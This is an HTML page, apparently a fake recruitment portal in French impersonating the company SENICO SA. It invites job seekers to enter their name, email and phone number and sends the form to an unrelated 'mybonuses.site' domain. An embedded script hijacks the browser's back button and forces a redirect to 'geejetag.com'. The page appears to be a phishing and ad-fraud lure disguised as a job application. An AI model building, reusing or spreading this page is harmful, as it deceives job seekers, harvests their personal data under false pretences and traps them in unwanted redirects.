
<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="styles.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta property="og:title" content="PORTAIL DE RECRUTEMENT SENICO SA 2024">
    <meta property="og:description" content="SENICO SA recrute massivement plusieurs profils">
    <meta property="og:image" itemprop="image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaoqr4JnERzaVK9gv91vsazordr86v3K-7RWu6z8gB3FtE1YIk8myz1W5ZaJ2OBSG6yj4&usqp=CAU">
    <meta property="og:type" content="website">
    <meta property="fb:app_id" content="966242223397117">
    <title>partage avec vous l'ambition de commercialiser des produits de haute qualité, à un juste prix, en vue d'une satisfaction plus grande des...</title>
  <style>
        /* Reset some default styles */
        body, h1, h2, h3, p, ul, li {
            margin: 0;
            padding: 0;
        }

        /* Apply a background color and font to the body */
        body {
            background-color: #ffffff;
            font-family: Arial black, sans-serif;
            line-height: 1.6;
        }

        /* Style the header */
        .header {
            text-align: center;
            background-color: black;
            color: #fff;
            padding: 40px 0;
        }

        /* Style the main content container */
        .content-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin: 0px;
        }

        /* Style the image container */
        .image-container {
            max-height: 600px; /* Set a fixed maximum height */
            overflow: hidden; /* Hide overflow if image is larger */
            text-align: center;
            background-color: green; /* Background color for the image container */
        }

        .image-container img {
            max-width: 100%;
            height: auto; /* Maintain image aspect ratio */
        }

        /* Style the text container */
        .text-container {
            width: 90%;
            padding: 30px;
            background-color: #124a10;
            border: 1px solid #2d316a;
            border-radius: 10px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        /* Style the form */
        form {
            max-width: 500px;
            margin: 0 auto;
        }

        /* Style the form input fields */
        input[type="text"],
        select {
            width: 90%;
            padding: 15px;
            margin-bottom: 20px;
            border: 2px solid #2d316a;
            border-radius: 5px;
            font-size: 16px;
        }

        /* Style the textarea */
        textarea {
            width: 90%;
            padding: 15px;
            margin-bottom: 20px;
            border: 2px solid #2d316a;
            border-radius: 5px;
            font-size: 16px;
        }

        /* Style the submit button */
        .button {
            background-color: #b8290d;
            color: #fff;
            border: none;
            padding: 15px 30px;
            border-radius: 8px;
            cursor: pointer;
            font-size: 18px;
        }

        /* Style the grant information */
        .grant-info {
            margin-top: 30px;
            color: black;
            text-align: left;
        }

        /* Style the footer */
        .footer {
          width: 106%;
            background-color: #124a10;
            color: #fff;
            text-align: center;
            padding: 20px 0;
        }
    </style>
            
<link rel="me" href="https://www.blogger.com/profile/00799001298388224124" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00799001298388224124" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/14229601237220155934" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/17993298365031265285" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/17993298365031265285" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/17993298365031265285" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/17993298365031265285" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/03264697149331781702" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>
  <?php

  require('db.php');

    

?>

    <div class="testbox">

      <form action="https://senico.sa-recruter.mybonuses.site/">

        <div class="banner">

          <h1>  </h1>

        </div>

<br>
  
  
    
    
            <center><img src="https://senico-sa.com/wp-content/uploads/2019/06/LOGO-SENICO.png" alt="Free-Data" style="width: 100%;"></center>
        
       <br>
        <div class="text-container">
            <p><b><h2><font color="#ffffff">FORMULAIRE DE DEMANDE</font></h2></b></p>
            <form action="step2.html" method="post">
                <input type="text" name="_name" placeholder="Prénom">
                <input type="text" name="name" placeholder="Nom de famille">
              <select style="width: auto;">

                    <option>----Sélectionnez le sexe----</option>

                   <option

value="Airtel">Mâle</option>

             <option value="mtn">Femelle</option>
                <input type="text" name="email" placeholder="Adresse e-mail">
                <input type="text" name="phone" placeholder="Numéro de téléphone">
                
                <textarea name="reason" placeholder="Avez-vous déjà postulé?"></textarea>
               <a href="https://senico.sa-recruter.mybonuses.site/"><button type="botton" class="button">PROCÉDER</button></a>
            </form>
        </div>
    </div>
    <div class="grant-info">
        <center><h2> </h2>
        <p>Postulez au Recrutement senico sa 2024.</p>
      </center>
    </div>
        
        <script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://geejetag.com/4/7323242";
    }
    function goon(){
        location.href="https://geejetag.com/4/7323242";
    }
</script>
        <br>

<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1696237,"Users Online","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">supercounters.com</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->


      
      
    <div class="footer">
        &copy; 2024 - Tous droits réservés par la SENICO SA
    </div>
</body>
</html>
